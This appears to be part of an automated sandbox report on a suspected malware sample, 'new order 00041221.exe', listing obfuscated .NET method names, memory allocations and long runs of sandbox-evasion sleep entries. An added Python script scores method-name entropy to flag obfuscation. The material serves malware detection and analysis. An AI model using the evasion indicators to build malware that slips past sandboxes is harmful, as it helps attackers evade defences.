Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, hoHp1pQctWiW4gDnx50.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tsAZTNw5uf', 'uYcZpVy21l', 'n6aZKsjMAm', 'GDwZAyOhkQ', 'WoaZMv3tJE', 'gutZgOrcEU', 'BvsZBefRFc'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, EOaFyVT7LVLL2nf3aa.cs High entropy of concatenated method names: 'QKq9GO9fTr', 'gyD9i53UBx', 'p2P9TW5cah', 'gms9pywHhM', 'dLy9am6YKj', 'Wnr9sI7qFF', 'x8A9hHXUN5', 't6m9tsNGWd', 'QGQ9eMPTLG', 'rti9upkk4l'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, AqI0NT2diOTHy7sR0b.cs High entropy of concatenated method names: 'tuV4nyOFRM', 'y6F4Xp7hNv', 'bmD41et1gl', 'UIY4FicyPl', 'TGo4q7HxGK', 'bQs4dAEteO', 'Yf14LiYr7Z', 'Dxn4vQZICO', 'dLt46E79RC', 'JoG4r6bHYo'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, GXXJusPBLvRYKwa80t.cs High entropy of concatenated method names: 'R32QdWoXcR', 'feeQLctu4W', 'HOxQ6eGOQE', 'eJMQrlq8D6', 'WsSQ90ZiII', 'bJlQbPLLSp', 'NnsoucCHxhjAwZMhmt', 'YGMTVDOjmS5iXELVeW', 'dmmQQah407', 'SgrQc2WkMG'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, UNqWbw3JDl6LusN8wK.cs High entropy of concatenated method names: 'Kjx4CvxSgn', 'ypk4aUWCm1', 'mlS4suMWec', 'dNl4h5XYDT', 'avw4T5rcsq', 'MqE4t5ZWy0', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, DsmWQqH9ImqBkLuxMX.cs High entropy of concatenated method names: 's9l8QCne5F', 'tjm8cvEgBE', 'DKB8PFkg0y', 'nwv8nxfSyE', 'LY88Xj82vM', 'zPt8FCqvDF', 'FIp8qBvDyt', 'bcB4BXeTTW', 'NR4421EPwJ', 'PLL434vFq2'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, bdkeCrEVO5b4aL692H.cs High entropy of concatenated method names: 'I8EwZfp6c', 'pUJU8T80o', 'AadmniBuO', 't2cR03kQc', 'oTVDWbFOM', 'ItkWLWrx1', 'X6e2a2abtuTE5Bm115', 'bcVhaRQTvD5v2RDGdp', 'U314W1CEr', 'oCHZooEr4'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, P6MW4SQV1ZS9x9j2kD1.cs High entropy of concatenated method names: 'XQK8OFv8Gd', 'vXR8jmwba6', 'SIS8wCjfnD', 'aVL8UZhaRv', 'Epq8x4uoDE', 'P0U8meJxAG', 'y288RW4Hr9', 'Ard8NsxcSb', 'HLs8DQc3WI', 'bdq8WFJSKe'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, GO6JcJXsuV8AKf3A4i.cs High entropy of concatenated method names: 'Dispose', 'bcRQ3ZkbIi', 'OMxEaZsbQ7', 'cNqUUWQuGV', 'nUqQHI0NTd', 'POTQzHy7sR', 'ProcessDialogKey', 'wbMEVNqWbw', 'QDlEQ6LusN', 'rwKEENsmWQ'
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, i8D6JcW7rn00w2sS0Z.cs High entropy of concatenated method names: 'Qd6Fx6BdST', 'cFgFR2Zn1M', 'BLd1s1n3JR', 'qKK1hqcd29', 'gh31tEIYRV', 'aug1eNL3oL', 'Sle1u2sA8l', 'TwD1lvAuXd', 'DYh1oHpr3v', 'lEU1GAIYf2'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, WEkErVgJn1PjkdRbDK.cs High entropy of concatenated method names: 'ksnI2GS1Sg', 'VnxIHA1l58', 't0a4VAcCPY', 'oQ84QADq3w', 'eI3I7WmpKy', 'EJuIi4Zvbw', 'fmqIJplq0r', 'h5TIThviGG', 'UvbIp8eT3v', 'EsqIKrXUbo'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, WWoXcRNneectu4WPwU.cs High entropy of concatenated method names: 'RKxXTaU8XU', 'O4fXpM9MLJ', 'JZQXK2uKPD', 'mq2XA3gDqd', 'kmHXM5uq7j', 'pN6XgcqyJ0', 'XptXBdQ7MW', 'Tf1X21wsy0', 'CygX3yV0An', 'aH8XHyXNT5'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs High entropy of concatenated method names: 'TnNcydYa2J', 'dDScniRR6g', 'uifcX6rF3s', 'nvTc17deCr', 'go7cFXNGOO', 'aeFcqE6AOX', 'p1GcdwLXIJ', 'q2WcLOinJS', 'M45cvlLUBX', 'vmHc6aeHeH'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, oea08sDOxeGOQEPJMl.cs High entropy of concatenated method names: 'cZi1UD1duR', 'Ts41mieuZQ', 'wtU1NFkZUI', 'iH71D659No', 'VnX19UvdC9', 'F9g1btumD8', 'Q6S1Ig8Mgq', 'H9t14PxF4A', 'cAt18gNNot', 'p6B1ZflOJY'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, XmPheVJY4ysEIwXRAO.cs High entropy of concatenated method names: 'CgOYNhHAP8', 'uRcYDFv0kY', 'L3KYCgYnO6', 'JhPYaQEUk1', 'LSDYhTMLv0', 'rnxYtRxO1p', 'Qy7YuRNx2J', 'dHDYl1xcid', 'vO6YG442JZ', 'tDbY7BPaeV'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, mbWDZh1fAEZLVbsgfE.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jw8E31Gaa6', 'nnVEHVEl9N', 'ndFEzAoAJN', 'paKcVOD7yC', 'j4acQh4pQv', 'tkRcEw5qPq', 'Nk6cc7I2M9', 'pyCWuszn5xgZTgfnr4'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, I7YwgKocvwlhG6qbjf.cs High entropy of concatenated method names: 'wdWdOkt4Ps', 'BamdjKUSML', 'eVCdwilZeg', 'mSHdUjUfqC', 'iCSdxYoDsc', 'aehdmNBA7r', 'am5dR4ucNm', 'F5tdNOlLFZ', 'W1LdDeFOWc', 'G3idWcUSLB'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, PIIQJlCPLLSpQvTcKh.cs High entropy of concatenated method names: 'b4GqyFWMdu', 'AfAqX6BqTP', 'ONFqFuTCFb', 'cCHqdTZVgh', 'eMVqLEAHQ3', 'iSpFMvLFvV', 'R9RFgeiQ7D', 'D7NFBRGC3o', 'vO1F2beHyp', 'CcWF3y8wEN'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, GYgZrNuv1RLjrByTBp.cs High entropy of concatenated method names: 'iuwdnHRsSL', 'QSMd1F3EnS', 'KJddqi2bQf', 'lwKqHsatdr', 'XY8qzqC01e', 'lu0dV442ey', 'of0dQ67e9b', 'GnEdEGwfuG', 'gk2dcRFu0Z', 'pKvdPIspOA'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, hoHp1pQctWiW4gDnx50.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tsAZTNw5uf', 'uYcZpVy21l', 'n6aZKsjMAm', 'GDwZAyOhkQ', 'WoaZMv3tJE', 'gutZgOrcEU', 'BvsZBefRFc'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, EOaFyVT7LVLL2nf3aa.cs High entropy of concatenated method names: 'QKq9GO9fTr', 'gyD9i53UBx', 'p2P9TW5cah', 'gms9pywHhM', 'dLy9am6YKj', 'Wnr9sI7qFF', 'x8A9hHXUN5', 't6m9tsNGWd', 'QGQ9eMPTLG', 'rti9upkk4l'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, AqI0NT2diOTHy7sR0b.cs High entropy of concatenated method names: 'tuV4nyOFRM', 'y6F4Xp7hNv', 'bmD41et1gl', 'UIY4FicyPl', 'TGo4q7HxGK', 'bQs4dAEteO', 'Yf14LiYr7Z', 'Dxn4vQZICO', 'dLt46E79RC', 'JoG4r6bHYo'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, GXXJusPBLvRYKwa80t.cs High entropy of concatenated method names: 'R32QdWoXcR', 'feeQLctu4W', 'HOxQ6eGOQE', 'eJMQrlq8D6', 'WsSQ90ZiII', 'bJlQbPLLSp', 'NnsoucCHxhjAwZMhmt', 'YGMTVDOjmS5iXELVeW', 'dmmQQah407', 'SgrQc2WkMG'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, UNqWbw3JDl6LusN8wK.cs High entropy of concatenated method names: 'Kjx4CvxSgn', 'ypk4aUWCm1', 'mlS4suMWec', 'dNl4h5XYDT', 'avw4T5rcsq', 'MqE4t5ZWy0', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, DsmWQqH9ImqBkLuxMX.cs High entropy of concatenated method names: 's9l8QCne5F', 'tjm8cvEgBE', 'DKB8PFkg0y', 'nwv8nxfSyE', 'LY88Xj82vM', 'zPt8FCqvDF', 'FIp8qBvDyt', 'bcB4BXeTTW', 'NR4421EPwJ', 'PLL434vFq2'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, bdkeCrEVO5b4aL692H.cs High entropy of concatenated method names: 'I8EwZfp6c', 'pUJU8T80o', 'AadmniBuO', 't2cR03kQc', 'oTVDWbFOM', 'ItkWLWrx1', 'X6e2a2abtuTE5Bm115', 'bcVhaRQTvD5v2RDGdp', 'U314W1CEr', 'oCHZooEr4'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, P6MW4SQV1ZS9x9j2kD1.cs High entropy of concatenated method names: 'XQK8OFv8Gd', 'vXR8jmwba6', 'SIS8wCjfnD', 'aVL8UZhaRv', 'Epq8x4uoDE', 'P0U8meJxAG', 'y288RW4Hr9', 'Ard8NsxcSb', 'HLs8DQc3WI', 'bdq8WFJSKe'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, GO6JcJXsuV8AKf3A4i.cs High entropy of concatenated method names: 'Dispose', 'bcRQ3ZkbIi', 'OMxEaZsbQ7', 'cNqUUWQuGV', 'nUqQHI0NTd', 'POTQzHy7sR', 'ProcessDialogKey', 'wbMEVNqWbw', 'QDlEQ6LusN', 'rwKEENsmWQ'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, i8D6JcW7rn00w2sS0Z.cs High entropy of concatenated method names: 'Qd6Fx6BdST', 'cFgFR2Zn1M', 'BLd1s1n3JR', 'qKK1hqcd29', 'gh31tEIYRV', 'aug1eNL3oL', 'Sle1u2sA8l', 'TwD1lvAuXd', 'DYh1oHpr3v', 'lEU1GAIYf2'
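The "High entropy of concatenated method names" entries above are a heuristic, not a decompilation result: the engine joins a class's method names into one string and measures how random the characters look. As an added example, not part of the Joe Sandbox report or of the sample, the following Python reproduces that check, adds a second cheap feature (how many names contain digits), and parses a report line of the format shown above so it can be run over an exported report. The 5.0 bits/character cut-off and all function names are assumptions; the report does not state the threshold Joe Sandbox applies. The obfuscated name list is copied from the oea08sDOxeGOQEPJMl.cs entry; the "clean" list is constructed for contrast.

```python
import math
import re
from collections import Counter

# Assumed cut-off: the report does not state the threshold Joe Sandbox uses.
# 5.0 bits per character separates the two sample lists below; tune it
# against a corpus of un-obfuscated assemblies before relying on it.
ENTROPY_THRESHOLD = 5.0

# Matches the report's "High entropy of concatenated method names" lines.
REPORT_LINE_RE = re.compile(
    r"^Source:\s+(?P<source>.+?),\s+(?P<cls>\S+\.cs)\s+"
    r"High entropy of concatenated method names:\s+(?P<names>.+)$"
)

# Method names copied from the report entry for oea08sDOxeGOQEPJMl.cs above.
OBFUSCATED = ['cZi1UD1duR', 'Ts41mieuZQ', 'wtU1NFkZUI', 'iH71D659No', 'VnX19UvdC9',
              'F9g1btumD8', 'Q6S1Ig8Mgq', 'H9t14PxF4A', 'cAt18gNNot', 'p6B1ZflOJY']

# Constructed contrast list of conventional WinForms / TypeConverter names
# (not taken from the sample).
CLEAN = ['Dispose', 'InitializeComponent', 'OnLoad', 'OnPaint', 'ProcessDialogKey',
         'GetEditStyle', 'EditValue', 'CanConvertFrom', 'ConvertFrom', 'ConvertTo']

# One report line copied verbatim from above, used as parser input.
SAMPLE_LINE = (
    "Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, oea08sDOxeGOQEPJMl.cs "
    "High entropy of concatenated method names: 'cZi1UD1duR', 'Ts41mieuZQ', "
    "'wtU1NFkZUI', 'iH71D659No', 'VnX19UvdC9', 'F9g1btumD8', 'Q6S1Ig8Mgq', "
    "'H9t14PxF4A', 'cAt18gNNot', 'p6B1ZflOJY'"
)


def shannon_entropy(text: str) -> float:
    """Bits per character of text; 0.0 for an empty or single-symbol string."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def method_name_entropy(names) -> float:
    """Entropy of all names joined into one string, which is what the signature measures."""
    return shannon_entropy("".join(names))


def digit_share(names) -> float:
    """Fraction of names that contain a digit; hand-written .NET identifiers rarely do."""
    if not names:
        return 0.0
    return sum(any(ch.isdigit() for ch in name) for name in names) / len(names)


def looks_obfuscated(names, threshold: float = ENTROPY_THRESHOLD) -> bool:
    """True when the concatenated-name entropy reaches the (assumed) threshold."""
    return method_name_entropy(names) >= threshold


def parse_report_line(line: str):
    """Split one report line into (source, class file, [method names]); None if it does not match."""
    m = REPORT_LINE_RE.match(line.strip())
    if not m:
        return None
    return m["source"], m["cls"], re.findall(r"'([^']*)'", m["names"])


if __name__ == "__main__":
    for label, names in (("obfuscated", OBFUSCATED), ("clean", CLEAN)):
        print(f"{label:10s} entropy={method_name_entropy(names):.2f} bits/char "
              f"digits={digit_share(names):.0%} flagged={looks_obfuscated(names)}")
    source, cls, names = parse_report_line(SAMPLE_LINE)
    print(f"{cls}: flagged={looks_obfuscated(names)} ({len(names)} names from {source})")
```

Because the measure runs over the concatenation, a class that keeps a few framework-mandated names (the mbWDZh1fAEZLVbsgfE.cs entry with 'EditValue' and 'GetEditStyle' next to random identifiers) still scores high; the digit-share feature catches the same thing from a different angle and is cheaper to explain in a triage note.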
Source: C:\Users\user\Desktop\new order 00041221.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\new order 00041221.exe Process information set: NOOPENFILEERRORBOX (98 identical entries)

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: B50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 2850000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 2580000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 6D40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 7D40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 7FC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 8FC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 1270000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 2EE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: 2DC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599766
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599546
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599437
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599328
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599218
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599000
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598890
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598672
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598461
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598344
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598125
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598016
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597906
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597797
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597687
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597569
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597447
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597336
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597219
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597094
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596961
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596823
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596703
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596588
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596469
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596318
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596165
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595844
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595653
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595547
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595433
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595313
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595188
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595063
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594938
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594828
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594719
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594594
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594484
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594374
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594266
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594156
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594047
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 593937
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 593828
Source: C:\Users\user\Desktop\new order 00041221.exe Window / User API: threadDelayed 7356
Source: C:\Users\user\Desktop\new order 00041221.exe Window / User API: threadDelayed 2473
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 4296 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep count: 37 > 30
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7388 Thread sleep count: 7356 > 30
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7388 Thread sleep count: 2473 > 30
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598461s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598016s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597569s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597447s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597336s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597219s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597094s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596961s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596823s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596588s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596469s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596318s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596165s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595844s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595653s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595547s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595433s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595313s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595188s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595063s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594938s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594719s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594594s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594484s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594374s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594266s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594156s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594047s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -593937s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -593828s >= -30000s
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598672 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598461 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598016 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597797 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597569 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597447 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597336 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597219 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597094 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596961 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596823 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596588 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596318 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596165 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595844 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595653 Jump to behavior
